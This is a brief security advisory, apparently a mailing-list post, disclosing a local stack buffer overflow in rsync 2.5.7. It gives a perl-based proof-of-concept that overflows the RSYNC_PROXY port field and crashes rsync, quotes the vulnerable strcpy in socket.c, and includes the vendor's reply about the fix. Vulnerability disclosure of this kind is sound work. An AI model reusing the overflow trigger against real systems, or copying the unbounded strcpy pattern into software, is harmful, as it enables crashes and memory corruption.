rsync <= 2.5.7 local buffer overflow (no root today:)

[DownBload <downbload () hotmail com>]

Hi, 

There is a local buffer overflow in rsync <= 2.5.7.
Problem is in open_socket_out function (socket.c). 
Attacker can overflow portbuf[10] buffer on stack and overwrite saved return
address.
Rsync isn't suid so, no root shell today :-).

PoC example:
[root@localhost rsync-2.5.7]# export RSYNC_PROXY=`perl -e 'print "A" x
100,":","A" x 1000'`
[root@localhost rsync-2.5.7]# rsync localhost::
rsync: getaddrinfo:
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAA: ai_family not supported
Segmentation fault
[root@localhost rsync-2.5.7]# 


- socket.c
...
        char portbuf[10];
        char *h;
        int proxied = 0;
        char buffer[1024];
        char *cp;


        h = getenv("RSYNC_PROXY");
        proxied = (h != NULL) && (*h != '\0');

        if (proxied) {
                strlcpy(buffer, h, sizeof(buffer));
                cp = strchr(buffer, ':');
                if (cp == NULL) {
                        rprintf(FERROR,
                                "invalid proxy specification: should be
HOST:PORT\n");
                        return -1;
                }
                *cp++ = '\0';
                strcpy(portbuf, cp);  // <- OVERFLOW
...


Vendor response:
"Correct.  I fixed this in the CVS version earlier this year.  Since the proxy
data is coming from the local environment, I don't see a need to roll out an
update to 2.6.0 (which is the latest released version, BTW).
The fix will be in 2.6.1, which should be released in the next month or two."



DownBload / Illegal Instruction Labs
http://www.ii-labs.org
e-mail:downbload[at]hotmail.com

"Born under the lucky star magical,
but on this earth generally tragical."